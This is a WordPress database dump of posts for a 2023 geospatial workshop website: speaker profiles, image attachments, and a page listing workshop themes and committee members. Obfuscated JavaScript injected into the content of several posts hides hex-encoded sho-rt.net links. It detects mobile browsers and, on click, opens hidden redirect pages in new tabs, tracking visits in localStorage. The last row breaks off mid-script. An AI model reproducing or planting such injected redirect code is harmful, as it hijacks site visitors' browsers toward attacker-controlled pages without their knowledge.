(2826,1,'2022-10-14 17:07:38','2022-10-14 17:07:38','<!-- wp:paragraph -->\n<p>Hebrew University of Jerusalem, Israel (WG IV/6)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. Yair Grinberger','','publish','closed','closed','','dr-yair-grinberger','','','2022-10-14 17:09:28','2022-10-14 17:09:28','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2826',0,'dt_team','',0),
(2827,1,'2022-10-14 17:07:29','2022-10-14 17:07:29','','w135','','inherit','open','closed','','w135','','','2022-10-14 17:07:29','2022-10-14 17:07:29','',2826,'https://gsw2023.com/wp-content/uploads/2022/10/w135.jpg',0,'attachment','image/jpeg',0),
(2828,1,'2022-10-14 17:08:29','2022-10-14 17:08:29','<!-- wp:paragraph -->\n<p>Technical University of Munich, Germany</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(WG IV/6)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr.Hao Li','','publish','open','closed','','hao-li','','','2023-01-07 13:51:58','2023-01-07 13:51:58','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2828',0,'dt_team','',0),
(2829,1,'2022-10-14 17:08:16','2022-10-14 17:08:16','','w13s','','inherit','open','closed','','w13s','','','2022-10-14 17:08:16','2022-10-14 17:08:16','',2828,'https://gsw2023.com/wp-content/uploads/2022/10/w13s.jpg',0,'attachment','image/jpeg',0),
(2830,1,'2022-10-14 17:13:40','2022-10-14 17:13:40','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h2>Secretary</h2>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"52\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n</ul>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 